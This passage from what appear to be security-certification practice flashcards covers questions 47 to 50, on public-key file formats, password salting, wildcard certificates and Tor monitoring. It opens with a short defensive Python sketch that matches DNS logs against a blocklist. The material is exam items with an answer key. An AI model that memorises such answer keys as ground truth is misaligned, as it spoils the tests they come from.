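A minimal sketch of how DNS logs support this kind of triage; the log format, client address, and domain names below are invented for illustration:

```python
# Hypothetical DNS query log lines (format invented for this example).
log_lines = [
    "2024-05-01T10:02:11 client=10.0.0.23 query=www.example.com type=A",
    "2024-05-01T10:05:47 client=10.0.0.23 query=malicious-cdn.invalid type=A",
    "2024-05-01T10:06:02 client=10.0.0.23 query=cdn.example.net type=A",
]

# Domains flagged by threat intelligence (also invented for the sketch).
blocklist = {"malicious-cdn.invalid"}

# Keep only the queries that resolved a known-bad domain.
hits = [line for line in log_lines
        if any(f"query={domain}" in line for domain in blocklist)]
for line in hits:
    print(line)
```

Matching resolved domains against threat intelligence in this way is what lets the analyst trace the infection back to the site Joe's browser contacted.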

47
Q

A third party asked a user to share a public key for secure communication. Which of the following file formats should the user choose to share the key?

a. .pfx
b. .csr
c. .pvk
d. .cer

A

d. .cer

Here’s why:

.cer (Certificate): A .cer file typically contains a public key and is often used for sharing certificates, including public keys issued by a Certificate Authority (CA). It can be shared securely as it only contains the public key information, which is intended to be publicly accessible.

Let’s briefly review the other options for clarity:

a. .pfx (Personal Information Exchange): A .pfx file contains both the public and private key pair along with any associated certificates. It is used for securely transferring certificates and private keys, but it includes sensitive information and is not suitable for sharing only the public key.

b. .csr (Certificate Signing Request): A .csr file is used to request a certificate from a Certificate Authority (CA) and contains information about the applicant and the public key. It is not used for sharing a public key directly.

c. .pvk (Private Key): A .pvk file contains a private key and is used for securely storing and transferring private keys. It is not appropriate for sharing a public key as it contains sensitive information.

Therefore, d. .cer is the correct file format to choose when sharing a public key for secure communication with a third party.

48
Q

A security administrator is working on a solution to protect passwords stored in a database against rainbow table attacks. Which of the following should the administrator consider?

a. Hashing
b. Salting
c. Lightweight cryptography
d. Steganography

A

b. Salting

Here’s why salting is the appropriate choice:

Salting: Salting involves adding a unique, random value (salt) to each password before hashing it. This salt value ensures that even if two users have the same password, their hashed passwords will be different because of the unique salt. Salting prevents attackers from precomputing hashes (as in rainbow tables) for common passwords across all users, as each user's salt modifies the resulting hash uniquely.

Let’s briefly review the other options for clarity:

a. Hashing: Hashing converts plaintext passwords into a fixed-size string of characters using a cryptographic hash function. While hashing is essential for storing passwords securely, it alone does not prevent rainbow table attacks without the addition of unique salts.

c. Lightweight cryptography: This term generally refers to cryptographic algorithms designed for resource-constrained environments. While important for efficiency in certain contexts, it does not specifically address rainbow table attacks on stored passwords.

d. Steganography: Steganography involves hiding information within other non-secret data. It is not relevant for protecting passwords in a database against rainbow table attacks.

Therefore, b. Salting is the measure the administrator should consider, because per-password salts make precomputed rainbow tables ineffective.
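The salting scheme described above can be sketched with Python's standard library (the PBKDF2 parameters here are illustrative, not a hardening recommendation):

```python
import hashlib
import os

def hash_password(password, salt=None):
    """Hash a password with a per-user random salt (sketch, not production code)."""
    salt = salt if salt is not None else os.urandom(16)   # unique 16-byte salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt, digest

# Same password for two users: different salts yield different digests,
# so a precomputed rainbow table matches neither stored hash.
salt1, digest1 = hash_password("hunter2")
salt2, digest2 = hash_password("hunter2")
print(digest1 != digest2)   # True

# Verification re-derives the digest from the stored salt.
assert hash_password("hunter2", salt1)[1] == digest1
```

Storing the salt alongside the digest is expected: the salt is not a secret, it only forces the attacker to attack each hash individually.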

49
Q

A company wants to deploy PKI on its internet-facing website. The applications that are currently deployed are:

*www.company.com (main website)
*contactus.company.com (for locating a nearby location)
*quotes.company.com (for requesting a price quote)

The company wants to purchase one SSL certificate that will work for all the existing applications and any future applications that follow the same naming conventions, such as store.company.com. Which of the following certificate types would BEST meet the requirements?

a. SAN
b. Wildcard
c. Extended validation
d. Self-signed

A

b. Wildcard certificate.

Here’s why:

Wildcard Certificate: A wildcard certificate is designed to secure a domain and all its subdomains. In this case, a wildcard certificate for *.company.com would secure www.company.com, contactus.company.com, quotes.company.com, and any future subdomains like store.company.com. This is particularly useful when you have multiple subdomains under the same domain (company.com in this case) and want a single certificate to cover them all.

SAN (Subject Alternative Name) Certificate: While SAN certificates can also cover multiple domain names (including different domains altogether), they require listing each domain explicitly in the certificate. This can become cumbersome if many subdomains are involved, unlike a wildcard certificate which covers all subdomains automatically.

Extended Validation (EV) Certificate: EV certificates provide higher validation standards but do not inherently cover multiple subdomains or wildcard domains. They focus more on verifying the legitimacy and identity of the organization behind the domain, rather than the number of subdomains covered.

Self-signed Certificate: Self-signed certificates are not suitable for internet-facing websites as they are not trusted by default by browsers and would trigger security warnings for users.

Therefore, for the company wanting to secure its existing subdomains and any future ones that follow the same naming convention, a wildcard certificate for *.company.com is the most appropriate choice among the options provided. Note that a wildcard matches exactly one label: it covers www.company.com and store.company.com, but not the bare apex domain company.com or deeper names such as a.b.company.com.
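The one-label matching rule for wildcards can be illustrated with a small helper (a simplification of RFC 6125 wildcard matching, written for this example):

```python
def matches_wildcard(hostname, pattern):
    """Simplified RFC 6125-style check: '*' matches exactly one left-most label."""
    if not pattern.startswith("*."):
        return hostname == pattern
    suffix = pattern[1:]                      # e.g. ".company.com"
    if not hostname.endswith(suffix):
        return False
    remainder = hostname[: -len(suffix)]      # the part '*' must cover
    return bool(remainder) and "." not in remainder

print(matches_wildcard("www.company.com", "*.company.com"))    # True
print(matches_wildcard("store.company.com", "*.company.com"))  # True
print(matches_wildcard("company.com", "*.company.com"))        # False: apex not covered
print(matches_wildcard("a.b.company.com", "*.company.com"))    # False: two labels
```

This is why the wildcard satisfies the question's naming convention (one subdomain level under company.com) while a name outside that pattern would need a SAN entry.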

50
Q

A security analyst is concerned about traffic initiated to the dark web from the corporate LAN. Which of the following networks should the analyst monitor?

a. SFTP
b. AIS
c. Tor
d. IoC

A

c. Tor.

Tor (The Onion Router): Tor is an overlay network that anonymizes traffic by routing it through layers of encrypted relays. It is the usual means of reaching the dark web, whose sites and services (.onion addresses) are not indexed by traditional search engines and are often used for illicit purposes. Monitoring for Tor traffic leaving the LAN therefore directly addresses the analyst's concern.

Here’s why the other options are not correct:

SFTP (Secure File Transfer Protocol): SFTP is a secure protocol used for transferring files securely over a network. It is not directly related to accessing the dark web.

AIS (Automated Indicator Sharing): In this context, AIS is the CISA/DHS service for exchanging cyber threat indicators between organizations in machine-readable form. It is a threat-intelligence sharing mechanism, not a network used to reach the dark web.

IoC (Indicators of Compromise): IoC refers to evidence that a system has been breached or compromised. It involves monitoring for signs of security breaches rather than specific network traffic related to accessing the dark web.

Therefore, the correct network that the security analyst should monitor for concerns related to traffic initiated to the dark web from the corporate LAN is c. Tor. This involves identifying and potentially monitoring Tor network traffic to detect any unauthorized or suspicious activities related to accessing the dark web from within the corporate network.